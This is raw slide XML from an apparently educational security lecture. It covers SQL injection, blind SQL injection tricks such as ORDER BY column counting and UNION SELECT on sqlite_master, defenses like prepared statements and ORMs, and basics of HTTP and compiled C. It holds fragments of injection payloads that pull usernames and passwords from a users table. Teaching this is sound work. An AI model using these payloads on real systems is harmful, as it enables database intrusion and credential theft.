                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t> username, passwd </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="35A327"/>
                </a:solidFill>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>FROM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t> users;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="77A09F"/>
                </a:solidFill>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>--';</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="3E3E3E"/>
              </a:solidFill>
              <a:ea typeface="Menlo"/>
              <a:cs typeface="Menlo"/>
              <a:sym typeface="Menlo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3243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Blind SQL Injection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2961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Basic SQL injection requires knowledge of the schema</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>e.g., knowing which table contains user data…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>And the structure (column names) of that table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Blind SQL injection leverages information leakage</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Used to recover schemas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Requires some observable indicator of query success or failure</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>e.g., a blank page (success/true) vs. an error page (failure/false)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Leakage performed bit-by-bit</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="161458651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EE92C-655C-4401-92CC-593EDA6D8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Blind SQL Injection Tricks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0368E-A54F-467B-ADF1-E2C37DF23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many columns does a table have?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Add </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ORDER BY </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>X</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> to a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SELECT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, where </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>X</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is a positive integer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If the query succeeds, then the table has at least </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>X</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> columns</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Increment </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>X</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> until the query fails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What are the names of tables in the database?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>All databases have meta-tables that store information about other tables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… </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>UNION SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sqlite_master</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>WHERE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> type=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>table</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>;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--</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="371680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2ABE93-0934-473D-83D0-4EBD2CEA8C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66464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750"/>
            <a:ext cx="10515600" cy="992795"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SQL Injection Defenses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2114"/>
            <a:ext cx="10515600" cy="562053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2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SELECT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="22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sz="22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*</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="22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sz="22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FROM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="22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users </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="22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WHERE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="22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sz="22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user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="22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lang="en-US" sz="220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'{{sanitize($id)}}'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="22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;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lv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dirty="0"/>
              <a:t>Sanitization</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Prepared statements</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Trust the database to interpolate user data into queries correctly</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Object-relational mappings (ORM)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Libraries that abstract away writing SQL statements</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Java – Hibernate</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Python – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>SQLAlchemy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, Django, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>SQLObject</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Ruby – Rails, Sequel</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Node.js – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Sequelize</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, ORM2, Bookshelf</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Domain-specific languages</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>LINQ (C#), Slick (Scala), ...</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="414772891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NoSQL?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Term for non-SQL databases</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Typically do not support relational (tabular) data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use much less expressive and powerful query languages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Are NoSQL databases vulnerable to injection?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>YES</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>All untrusted input should always be validated and sanitized</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Even with ORM and NoSQL</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="135813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C9CC24-B375-4226-BF2B-61FADBBA6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70A28E-4FD8-4474-A206-E15B5EBB3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084747"/>
            <a:ext cx="12188952" cy="3294207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9647E21-5366-4638-AC97-D8CD4111E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r="8214" b="45501"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="0" y="0"/>
            <a:ext cx="12191999" cy="4473360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8ECD8A6-945A-4663-9D24-7E0287644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925" y="2076450"/>
            <a:ext cx="10684151" cy="13451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Program Execution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5C7ACE-9E25-428E-A99E-7CDF262FD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71575" y="4473360"/>
            <a:ext cx="9469211" cy="8656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1100" kern="12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Code and Data Memory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1100" kern="12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Program Execution</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1100" kern="12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The Stack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="243932244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24FF83-6B81-4006-81EF-4C8398464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4CBB9D-42C8-4128-9E7E-878F48C7E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94245"/>
            <a:ext cx="10515600" cy="218271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Computers don’t execute source code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Instead, they execute machine code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Compilers translate source code to machine code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Assembly is human-readable machine code</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="compiler.pdf">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{935C940A-9977-4211-8265-D657F58A04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328329" y="1572861"/>
            <a:ext cx="8948584" cy="22337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94580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Hypertext Transfer Protocol</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Client/server protocol</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Intended for downloading HTML documents</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Can be generalized to download any kind of file</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>HTTP message format</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Text based protocol, almost always over TCP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Stateless</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Requests and responses must have a header, body is optional</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Headers includes key: value pairs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Body typically contains a file (GET) or user data (POST)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Various versions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>0.9 and 1.0 are outdated, 1.1 is most common, 2.0 is new and complicated</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="280190043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727CC-917C-4B7B-A188-BF6499340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671" y="1421359"/>
            <a:ext cx="3867054" cy="435133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</a:rPr>
              <a:t>#include &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>stdio.h</a:t>
            </a:r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chemeClr val="accent1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 main(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent1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argc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char</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>** </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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chemeClr val="accent1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if</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>argc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> &gt; 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latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin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latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin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</a:rPr>
              <a:t> &lt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>argc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>; ++</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin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    puts(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin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</a:rPr>
              <a:t>]);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else</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"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  puts(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"Hello world"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty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latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 1;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496CD4D-0D71-4E28-AF8A-7C5A1BDEA21D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4976883" y="1815390"/>
            <a:ext cx="644174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3A0207-5E4B-40AD-90B4-E3A11D8EDFDF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4604166" y="343408"/>
            <a:ext cx="7324389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</a:rPr>
              <a:t>000000000040052d &lt;main&gt;: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40052d:       55                      push   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>rbp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  40052e:       48 89 e5                </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>mov</a:t>
            </a:r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dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>rbp,rsp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  400531:       48 83 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 20             sub    rsp,0x20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400535:       89 7d </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>                </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    DWORD PTR [rbp-0x14],</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>edi</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  400538:       48 89 75 e0             </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    QWORD PTR [rbp-0x20],</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>rsi</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  40053c:       83 7d </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 01             </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>cmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    DWORD PTR [rbp-0x14],0x1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400540:       7e 36                   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>jle</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    400578 &lt;main+0x4b&gt;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400542:       c7 45 fc 01 00 00 00    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    DWORD PTR [rbp-0x4],0x1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400549:       </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>eb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 23                   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>jmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    40056e &lt;main+0x41&gt;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40054b:       8b 45 fc                </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>mov</a:t>
            </a:r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dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>eax,DWORD</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> PTR [rbp-0x4]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40054e:       48 98                   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>cdqe</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
